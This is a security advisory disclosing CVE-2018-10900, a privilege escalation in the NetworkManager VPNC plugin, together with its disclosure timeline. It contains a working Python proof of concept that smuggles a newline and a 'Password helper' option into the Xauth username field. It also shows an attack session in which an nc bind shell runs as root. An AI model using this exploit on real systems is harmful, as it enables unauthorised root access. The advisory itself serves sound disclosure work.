Network Manager VPNC - Privilege Escalation (CVE-2018-10900) Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc Date Released: 21/07/2018 CVE: CVE-2018-10900 Author: Denis Andzakovic Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc Affected Software: Network Manager VPNC a 1.2.4 --[ Description The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root. --[ Privilege Escalation When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file. The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter. import dbus con = { 'vpn':{ 'service-type':'org.freedesktop.NetworkManager.vpnc', 'data':{ 'IKE DH Group':'dh2', 'IPSec ID':'testgroup', 'IPSec gateway':'gateway', 'IPSec secret-flags':'4', 'Local Port':'0', 'NAT Traversal Mode': 'natt', 'Perfect Forward Secrecy': 'server', 'Vendor': 'cisco', 'Xauth password-flags': '4', 'Xauth username': "username\nPassword helper /tmp/test", 'ipsec-secret-type': 'unused', 'xauth-password-type': 'unused' } }, 'connection':{ 'type':'vpn', 'id':'vpnc_test', }, 'ipv4':{'method':'auto'}, 'ipv6':{'method':'auto'} } bus = dbus.SystemBus() proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings") settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings") settings.AddConnection(con) The above results in the following configuration being passed to the vpnc process when the connection is initialized: Debug 0 Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4 Cisco UDP Encapsulation Port 0 Local Port 0 IKE DH Group dh2 Perfect Forward Secrecy server Xauth username username Password helper /tmp/test IPSec gateway gateway IPSec ID testgroup Vendor cisco NAT Traversal Mode natt The following figure details the complete privilege escalation attack. doi@ubuntu:~$ cat << EOF > /tmp/test > #!/bin/bash > mkfifo pipe > nc -k -l -p 8080 < pipe | /bin/bash > pipe > EOF doi@ubuntu:~$ python vpnc_privesc.py doi@ubuntu:~$ nmcli connection NAME UUID TYPE DEVICE Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3 vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3 doi@ubuntu:~$ nmcli connection up vpnc_test ^Z [1]+ Stopped nmcli connection up vpnc_test doi@ubuntu:~$ nc -vv 127.0.0.1 8080 Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded! id uid=0(root) gid=0(root) groups=0(root) --[ Timeline 11/07/2018 - Advisory sent to security@gnome.org 13/07/2018 - Acknowledgement from Gnome security 20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day 21/07/2018 - Network Manager VPNC 1.2.6 released 21/07/2018 - Advisory released --[ About Pulse Security Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services. W: https://pulsesecurity.co.nz E: info at pulsesecurity.co.nz